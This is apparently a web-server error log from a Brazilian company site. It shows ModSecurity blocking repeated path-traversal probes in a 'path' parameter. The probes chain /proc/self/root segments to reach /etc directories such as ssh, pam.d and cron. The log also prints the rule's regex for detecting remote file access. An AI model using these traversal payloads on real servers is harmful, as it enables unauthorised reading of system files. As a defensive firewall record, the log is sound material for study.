[Mon Mar 16 12:59:49.860195 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.241.46:46402] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgo9Zqj1wV0Si-OkefvdAAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:59:51.234913 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.241.46:44472] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgo946lpbStxTqkSkttpAAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Mon Mar 16 13:00:00.183945 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:44474] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpAP9ocpUE4ed4uDzwTQAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:00:00.727726 2026] [:error] [pid 21946:tid 140411565680384] [client 74.7.243.203:49384] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpAHbQATo66fKoS7xRbQAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:00:07.315408 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:39196] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpB46lpbStxTqkSkttsQAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:00:11.952775 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:39212] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpC_9ocpUE4ed4uDzwWAAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:00:13.287449 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:53680] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpDbABkC4fWIHEf8HsXgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:00:14.564431 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.243.203:53692] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpDhXjF1vJNtV6CWr3eQAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:00:16.011442 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.241.46:35830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpEHjZBu2q05ozVU9ZSAAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:00:25.747208 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.243.203:53702] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpGbysWC90G-1nBrBGyAAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:00:27.324614 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.243.203:56932] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpG3jZBu2q05ozVU9ZSQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:00:32.703168 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:44068] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpINSswJuvopo3lOhgbAAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:00:38.244496 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:36872] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpJo6lpbStxTqkSkttuQAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:00:40.489775 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:56934] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpKNSswJuvopo3lOhgcQAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:00:40.624063 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:33354] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpKJqj1wV0Si-OkefvjAAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:00:46.170078 2026] [:error] [pid 32654:tid 140411674785536] [client 74.7.241.46:33356] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpLQlT9VtDQc7bgUy0HAAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:01:03.359015 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:37514] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpP9SswJuvopo3lOhgigAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:01:05.769329 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:47718] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpQXjZBu2q05ozVU9ZZgAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:01:07.044585 2026] [:error] [pid 21946:tid 140411599251200] [client 74.7.243.203:47720] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpQ3bQATo66fKoS7xRpQAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:01:14.647078 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.243.203:47730] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpSnbQATo66fKoS7xRrgAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:01:18.610461 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.243.203:58494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpTv9ocpUE4ed4uDzwewAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:01:23.200078 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.241.46:42858] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpU7ABkC4fWIHEf8HsjQAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
